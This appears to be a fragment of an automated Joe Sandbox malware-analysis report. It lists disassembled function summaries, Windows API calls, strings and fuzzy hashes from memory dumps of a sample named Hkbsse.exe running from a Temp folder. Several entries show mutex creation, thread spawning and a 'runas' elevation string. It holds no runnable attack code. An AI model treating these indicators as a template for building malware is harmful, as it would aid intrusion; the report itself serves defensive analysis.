                      • Part of subcall function 044AE686: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 044AE73C
                      • Part of subcall function 044AE686: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 044AE744
                    • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 044A53B4
                    • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 044A53BE
                    • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 044A53C8
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceValueVirtualWork
                    • String ID:
                    • API String ID: 2616382602-0
                    • Opcode ID: 935f95a8d328cb7e17ad73e666d247f97af5b027fc0f75f92dedba51ab608920
                    • Instruction ID: a0b26b17d1de3ee09791b20b72521736b11abd056e58a67a50a28c9d68fef60e
                    • Opcode Fuzzy Hash: 935f95a8d328cb7e17ad73e666d247f97af5b027fc0f75f92dedba51ab608920
                    • Instruction Fuzzy Hash: 00F0F671A00518B7EF25B727881096EF769DFB0618B84012FE81193291EFB4BE35C7C2
                    APIs
                      • Part of subcall function 004099D0: Sleep.KERNELBASE(00000064), ref: 0040A933
                      • Part of subcall function 004099D0: CreateMutexA.KERNELBASE(00000000,00000000,00463224), ref: 0040A951
                      • Part of subcall function 004099D0: GetLastError.KERNEL32 ref: 0040A959
                      • Part of subcall function 004099D0: GetLastError.KERNEL32 ref: 0040A96A
                      • Part of subcall function 00405BC0: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,80000001,0000043f,00000008,00000423,00000008,00000422,00000008,00000419,00000008), ref: 0040612D
                    • CreateThread.KERNEL32(00000000,00000000,Function_00016B80,00000000,00000000,00000000), ref: 00416D46
                    • CreateThread.KERNEL32(00000000,00000000,Function_00016C10,00000000,00000000,00000000), ref: 00416D57
                    • CreateThread.KERNEL32(00000000,00000000,Function_00016CA0,00000000,00000000,00000000), ref: 00416D68
                    • Sleep.KERNEL32(00007530), ref: 00416D75
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Create$Thread$ErrorLastSleep$MutexOpen
                    • String ID:
                    • API String ID: 3966068485-0
                    • Opcode ID: f5d0eeff358944ea3866414c35db1e035878ca345e6e00d6db8bbff552f4029d
                    • Instruction ID: 31902ad575a48c38801987c82ff2dd8d9c076a2f2ea5494020ecf42ec81d45e6
                    • Opcode Fuzzy Hash: f5d0eeff358944ea3866414c35db1e035878ca345e6e00d6db8bbff552f4029d
                    • Instruction Fuzzy Hash: C6F0C975BD471475F13032A62C03F9A29145B04F65F320527B7587E1D299DCB4818AEF
                    APIs
                    • Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00429629
                      • Part of subcall function 0041F5DB: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 00425596
                    • Concurrency::details::ContextBase::CancelCollection.LIBCONCRT ref: 0042964D
                    • Concurrency::details::_TaskCollectionBase::_FinishCancelState.LIBCMT ref: 00429660
                    • Concurrency::details::ContextBase::CancelStealers.LIBCMT ref: 00429669
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Base::Concurrency::details::$CancelContextScheduler$Collection$Base::_Concurrency::details::_CurrentDefaultFinishStateStealersTask
                    • String ID:
                    • API String ID: 218105897-0
                    • Opcode ID: 4b9cacacb2642105106c1960082ff98311365aed8213a72dc6553885aca439e3
                    • Instruction ID: 93f89da88a0149968f4bc4dad75d0c9ef1f1bc6a703f7e560df40d29a4a9f6d4
                    • Opcode Fuzzy Hash: 4b9cacacb2642105106c1960082ff98311365aed8213a72dc6553885aca439e3
                    • Instruction Fuzzy Hash: A5F0A070300A305EE661AA26A812F6E23D99F44758F40881FE45B87282CE2CEC43CB5D
                    APIs
                    • WriteConsoleW.KERNEL32(00408770,0000000F,0045FBB0,00000000,00408770,?,0044525A,00408770,00000001,00408770,00408770,?,00440137,00000000,?,00408770), ref: 00446B86
                    • GetLastError.KERNEL32(?,0044525A,00408770,00000001,00408770,00408770,?,00440137,00000000,?,00408770,00000000,00408770,?,0044068B,00408770), ref: 00446B92
                      • Part of subcall function 00446B58: CloseHandle.KERNEL32(FFFFFFFE,00446BA2,?,0044525A,00408770,00000001,00408770,00408770,?,00440137,00000000,?,00408770,00000000,00408770), ref: 00446B68
                    • ___initconout.LIBCMT ref: 00446BA2
                      • Part of subcall function 00446B1A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00446B49,00445247,00408770,?,00440137,00000000,?,00408770,00000000), ref: 00446B2D
                    • WriteConsoleW.KERNEL32(00408770,0000000F,0045FBB0,00000000,?,0044525A,00408770,00000001,00408770,00408770,?,00440137,00000000,?,00408770,00000000), ref: 00446BB7
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                    • String ID:
                    • API String ID: 2744216297-0
                    • Opcode ID: 68f8837eb1d4a2712d10f3c5b8a7bf099e143a904c0dfdbb60282304a99716f4
                    • Instruction ID: 62f88e2b5bb4a89209554c6b3be65d4fc596e2bd3b8c6ec97840f3fc23b8838f
                    • Opcode Fuzzy Hash: 68f8837eb1d4a2712d10f3c5b8a7bf099e143a904c0dfdbb60282304a99716f4
                    • Instruction Fuzzy Hash: 7BF03736101274BBDF521F95DC0898A3F2AFB457A1F014062FD1CC5131D672DD209B99
                    APIs
                    • WriteConsoleW.KERNEL32(044889D7,0000000F,0045FBB0,00000000,044889D7,?,044C54C1,044889D7,00000001,044889D7,044889D7,?,044C039E,00000000,?,044889D7), ref: 044C6DED
                    • GetLastError.KERNEL32(?,044C54C1,044889D7,00000001,044889D7,044889D7,?,044C039E,00000000,?,044889D7,00000000,044889D7,?,044C08F2,044889D7), ref: 044C6DF9
                      • Part of subcall function 044C6DBF: CloseHandle.KERNEL32(00462970,044C6E09,?,044C54C1,044889D7,00000001,044889D7,044889D7,?,044C039E,00000000,?,044889D7,00000000,044889D7), ref: 044C6DCF
                    • ___initconout.LIBCMT ref: 044C6E09
                      • Part of subcall function 044C6D81: CreateFileW.KERNEL32(00457658,40000000,00000003,00000000,00000003,00000000,00000000,044C6DB0,044C54AE,044889D7,?,044C039E,00000000,?,044889D7,00000000), ref: 044C6D94
                    • WriteConsoleW.KERNEL32(044889D7,0000000F,0045FBB0,00000000,?,044C54C1,044889D7,00000001,044889D7,044889D7,?,044C039E,00000000,?,044889D7,00000000), ref: 044C6E1E
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                    • String ID:
                    • API String ID: 2744216297-0
                    • Opcode ID: 68f8837eb1d4a2712d10f3c5b8a7bf099e143a904c0dfdbb60282304a99716f4
                    • Instruction ID: 3903a9de23ec4b8858c95e7d559f180de9cf867042ab09dc708b11ede14e8040
                    • Opcode Fuzzy Hash: 68f8837eb1d4a2712d10f3c5b8a7bf099e143a904c0dfdbb60282304a99716f4
                    • Instruction Fuzzy Hash: 67F01C3A501214BBDFA21FA5EC0899A3F26EB483A1F058126FA1C85121D672D820DB95
                    APIs
                    • SleepConditionVariableCS.KERNELBASE(?,0041D246,00000064), ref: 0041D2CC
                    • LeaveCriticalSection.KERNEL32(00465720,00468650,?,0041D246,00000064,?,76230F00,?,0040765D,00468650), ref: 0041D2D6
                    • WaitForSingleObjectEx.KERNEL32(00468650,00000000,?,0041D246,00000064,?,76230F00,?,0040765D,00468650), ref: 0041D2E7
                    • EnterCriticalSection.KERNEL32(00465720,?,0041D246,00000064,?,76230F00,?,0040765D,00468650), ref: 0041D2EE
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                    • String ID:
                    • API String ID: 3269011525-0
                    • Opcode ID: 14bf3a9d4be9bf837093a7814f6444b67149b9ba994a1b02bf3174ea719e34b8
                    • Instruction ID: 1ac50c9b0066e0c4a2d53f3e21af84157b5af11804174151a578e244d4ee8ebf
                    • Opcode Fuzzy Hash: 14bf3a9d4be9bf837093a7814f6444b67149b9ba994a1b02bf3174ea719e34b8
                    • Instruction Fuzzy Hash: 6DE0ED35541B24E7CB112B94AC08A8E3B18EB09753F144072F9059656196B598419BDE
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID: runas
                    • API String ID: 3472027048-4000483414
                    • Opcode ID: 3d76a9baea452867510f7c81a089139e7bb2d27326516a2e7019a00988786ba5
                    • Instruction ID: 9d19d4fe5d809e0f9ff9941f70a6e5c2266b8a13b716b69cce3286adae415981
                    • Opcode Fuzzy Hash: 3d76a9baea452867510f7c81a089139e7bb2d27326516a2e7019a00988786ba5
                    • Instruction Fuzzy Hash: 1CE11BB1E14144ABEB08EF78CD4679E7B719F41308F50815EF411A73C6DB7DAA40879A
                    APIs
                    • __Mtx_init_in_situ.LIBCPMT ref: 0041744C
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_init_in_situ
                    • String ID: @.@$@|A
                    • API String ID: 3366076730-1638491229
                    • Opcode ID: 9198d7d0723313f094a4fbefec6dcaa9f5ff6ff65217a6e00dcf0e57fd239118
                    • Instruction ID: 5e1297a57d6b7b639a8e02b3d6bde4c068ab49fd92cbbf4b728f3a3119506081
                    • Opcode Fuzzy Hash: 9198d7d0723313f094a4fbefec6dcaa9f5ff6ff65217a6e00dcf0e57fd239118
                    • Instruction Fuzzy Hash: 23A136B0A01619CFDB21CF69C98479EBBF0FF48714F18819AE819AB351E7799D41CB84
                    Strings
                    • C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe, xrefs: 004390FD, 0043913A
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe
                    • API String ID: 0-2480956006
                    • Opcode ID: a17d57e60d168b2e2e9f8c893ba8581ed93e8945fc96e4ae5ef2c64ef190e72b
                    • Instruction ID: e36cff2137ef11141afc6ba0048b09c1a3638fd79f1bf7c1abf2875572eb59fc
                    • Opcode Fuzzy Hash: a17d57e60d168b2e2e9f8c893ba8581ed93e8945fc96e4ae5ef2c64ef190e72b
                    • Instruction Fuzzy Hash: 4941D271A00215ABEF15DF9ADC859AFBBB8EB8D300F14106BE400A7351E7F88E41CB59
                    APIs
                    • __Cnd_destroy_in_situ.LIBCPMT ref: 00417B48
                    • __Mtx_destroy_in_situ.LIBCPMT ref: 00417B51
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Cnd_destroy_in_situMtx_destroy_in_situ
                    • String ID: {A
                    • API String ID: 1432671424-169627337
                    • Opcode ID: 49822466f79195f0923cdfa79eb360033f78237c3dc66e2f1ea9358432c9a1c7
                    • Instruction ID: 190a37b34fbfeecb8fffc7a3455fb99a6090ca9c34ce7be73932cc516f32dd04
                    • Opcode Fuzzy Hash: 49822466f79195f0923cdfa79eb360033f78237c3dc66e2f1ea9358432c9a1c7
                    • Instruction Fuzzy Hash: 0631F3B1A047009BD720DF68D845A9BB7F8EF14354F100A2FE946C3241E779FA94C3A9
                    Strings
                    • C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe, xrefs: 044B9364, 044B93A1
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe
                    • API String ID: 0-2480956006
                    • Opcode ID: a17d57e60d168b2e2e9f8c893ba8581ed93e8945fc96e4ae5ef2c64ef190e72b
                    • Instruction ID: 1e44a30b8b41ac28396a2e2afe1b728d495e6675528631cdc0ed7e26163a5760
                    • Opcode Fuzzy Hash: a17d57e60d168b2e2e9f8c893ba8581ed93e8945fc96e4ae5ef2c64ef190e72b
                    • Instruction Fuzzy Hash: 7041A9B1A04614ABDF25DF9A98819DFBBB8EF88310F14406BE541D7351EBB0AA40C7F1
                    APIs
                      • Part of subcall function 044BE563: GetOEMCP.KERNEL32(00000000,044BE7D5,?,?,044B78F5,044B78F5,?), ref: 044BE58E
                    • _free.LIBCMT ref: 044BE832
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID: @"F
                    • API String ID: 269201875-3084318295
                    • Opcode ID: 63543627e392427e2bb9f2d8bdd097651d763b6fbf4343d7bf33c5043982c81c
                    • Instruction ID: a619cf8e048a6a5cc2613f6b9b6b599ad8aafd4085c34e5d34a7cb6dcc28c94f
                    • Opcode Fuzzy Hash: 63543627e392427e2bb9f2d8bdd097651d763b6fbf4343d7bf33c5043982c81c
                    • Instruction Fuzzy Hash: 63319271900A49AFDF11DF59D840ADF77F4EF84314F21406AE8909B2A1EB71E950CBA0
                    APIs
                    • __Mtx_init_in_situ.LIBCPMT ref: 00403962
                    • __Mtx_init_in_situ.LIBCPMT ref: 004039A1
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_init_in_situ
                    • String ID: pB@
                    • API String ID: 3366076730-522444117
                    • Opcode ID: 74691cddd157f9733b136221944eda0284ddcc00da53afa76240b6fc065f8951
                    • Instruction ID: 85cc1f21d270febbee68db5d29f907cdb29bffcc18a0c6cdd29de26c28620044
                    • Opcode Fuzzy Hash: 74691cddd157f9733b136221944eda0284ddcc00da53afa76240b6fc065f8951
                    • Instruction Fuzzy Hash: C04127B46017058FD720CF29C988B5ABBF4FF44315F10861EE86A8B381E7B8A905CF80
                    APIs
                    • __alloca_probe_16.LIBCMT ref: 0041B76E
                    • RaiseException.KERNEL32(?,?,?,?), ref: 0041B793
                      • Part of subcall function 00433C12: RaiseException.KERNEL32(E06D7363,00000001,00000003,@E,?,?,?,0045E440), ref: 00433C72
                      • Part of subcall function 00438C8F: IsProcessorFeaturePresent.KERNEL32(00000017,0043A7CD,?,?,00436A5A,?,?,?,?,0043768E,?), ref: 00438CAB
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                    • String ID: csm
                    • API String ID: 1924019822-1018135373
                    • Opcode ID: c95906c105d3fe5d98dead7adff23072b26268c9b0da60fee90a03e3cf153ed8
                    • Instruction ID: 279872545446a478c70440809aaa54d3911d66500b0e0947e58eeb54dd8337e2
                    • Opcode Fuzzy Hash: c95906c105d3fe5d98dead7adff23072b26268c9b0da60fee90a03e3cf153ed8
                    • Instruction Fuzzy Hash: 7521B635D002189BCF24EFA5D945AEEB3B5EF84715F58401EE419AB290CB38AD85CBC5
                    APIs
                      • Part of subcall function 00436ADC: _free.LIBCMT ref: 00436AEA
                      • Part of subcall function 0043B139: MultiByteToWideChar.KERNEL32(0043E7FD,00000100,E8458D00,00000000,00000000,00000020,?,0043F2AF,00000000,00000000,00000100,00000020,00000000,00000000,E8458D00,00000100), ref: 0043B1A9
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,00436E4A,00000000,?,00000000,?), ref: 004369AF
                    • __dosmaperr.LIBCMT ref: 004369B6
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharErrorLastMultiWide__dosmaperr_free
                    • String ID: JnC
                    • API String ID: 4030486722-2531755783
                    • Opcode ID: 542da8e16dc8448421128fe7dc572524c7bf7eb1b3f266dbcc14f135b89de347
                    • Instruction ID: a10604e378203b479d6c6f5be248016944f26615d1a374979f6fa953727c9187
                    • Opcode Fuzzy Hash: 542da8e16dc8448421128fe7dc572524c7bf7eb1b3f266dbcc14f135b89de347
                    • Instruction Fuzzy Hash: 75210BB1500612BBCB206F278C01B1B77A9EF49370F12D21FF5699B290D778E8108BD9
                    APIs
                    • Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 00431872
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004318BD
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
                    • String ID: pContext
                    • API String ID: 3390424672-2046700901
                    APIs
                    • ___std_exception_copy.LIBVCRUNTIME ref: 0040247E
                      • Part of subcall function 00433C12: RaiseException.KERNEL32(E06D7363,00000001,00000003,@E,?,?,?,0045E440), ref: 00433C72
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Similarity
                    • API ID: ExceptionRaise___std_exception_copy
                    • String ID: P#@$P#@
                    • API String ID: 3109751735-3974838576
                    APIs
                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0041D32A
                    • ___raise_securityfailure.LIBCMT ref: 0041D411
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Similarity
                    • API ID: FeaturePresentProcessor___raise_securityfailure
                    • String ID: @WF
                    • API String ID: 3761405300-3852368868
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Similarity
                    • API ID: Mtx_unlock
                    • String ID: P#@$P#@
                    • API String ID: 1418687624-3974838576
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Similarity
                    • API ID: _free
                    • String ID: x!F
                    • API String ID: 269201875-3062043068
                    APIs
                    • RaiseException.KERNEL32(E06D7363,00000001,00000003,@E,?,?,?,0045E440), ref: 00433C72
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Similarity
                    • API ID: ExceptionRaise
                    • String ID: @E$@E
                    • API String ID: 3997070919-1681324763
                    APIs
                    • __Cnd_destroy_in_situ.LIBCPMT ref: 00419B6B
                    • __Mtx_destroy_in_situ.LIBCPMT ref: 00419B74
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Similarity
                    • API ID: Cnd_destroy_in_situMtx_destroy_in_situ
                    • String ID: {A
                    • API String ID: 1432671424-169627337
                    APIs
                      • Part of subcall function 00433C12: RaiseException.KERNEL32(E06D7363,00000001,00000003,@E,?,?,?,0045E440), ref: 00433C72
                    • ___std_exception_copy.LIBVCRUNTIME ref: 0040247E
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Similarity
                    • API ID: ExceptionRaise___std_exception_copy
                    • String ID: P#@$P#@
                    • API String ID: 3109751735-3974838576
                    APIs
                      • Part of subcall function 00402AF0: ___std_exception_copy.LIBVCRUNTIME ref: 00402B23
                      • Part of subcall function 00433C12: RaiseException.KERNEL32(E06D7363,00000001,00000003,@E,?,?,?,0045E440), ref: 00433C72
                    • ___std_exception_copy.LIBVCRUNTIME ref: 0040343E
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Similarity
                    • API ID: ___std_exception_copy$ExceptionRaise
                    • String ID: P#@$P#@
                    • API String ID: 2103344913-3974838576
                    APIs
                    • __Mtx_destroy_in_situ.LIBCPMT ref: 00417C66
                    • __Cnd_destroy_in_situ.LIBCPMT ref: 00417C6F
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Similarity
                    • API ID: Cnd_destroy_in_situMtx_destroy_in_situ
                    • String ID: @.@
                    • API String ID: 1432671424-4060093550
                    APIs
                    • GetOEMCP.KERNEL32(00000000,0043E56E,?,?,0043768E,0043768E,?), ref: 0043E327
                    • GetACP.KERNEL32(00000000,0043E56E,?,?,0043768E,0043768E,?), ref: 0043E33E
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Similarity
                    • API ID:
                    • String ID: nC
                    • API String ID: 0-511710893
                    APIs
                    • ___std_exception_copy.LIBVCRUNTIME ref: 00402552
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Similarity
                    • API ID: ___std_exception_copy
                    • String ID: P#@$P#@
                    • API String ID: 2659868963-3974838576
                    APIs
                    • RtlEnterCriticalSection.NTDLL(00465720), ref: 0449D493
                    • RtlLeaveCriticalSection.NTDLL(00465720), ref: 0449D4D0
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Similarity
                    • API ID: CriticalSection$EnterLeave
                    • String ID: WF
                    • API String ID: 3168844106-2907287748
                    APIs
                    • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0042BA5E
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042BA71
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Similarity
                    • API ID: Concurrency::details::FreeIdleProxyProxy::ReturnThreadstd::invalid_argument::invalid_argument
                    • String ID: pContext
                    • API String ID: 548886458-2046700901
                    APIs
                    • __Mtx_destroy_in_situ.LIBCPMT ref: 00402E50
                    • __Cnd_destroy_in_situ.LIBCPMT ref: 00402E59
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Similarity
                    • API ID: Cnd_destroy_in_situMtx_destroy_in_situ
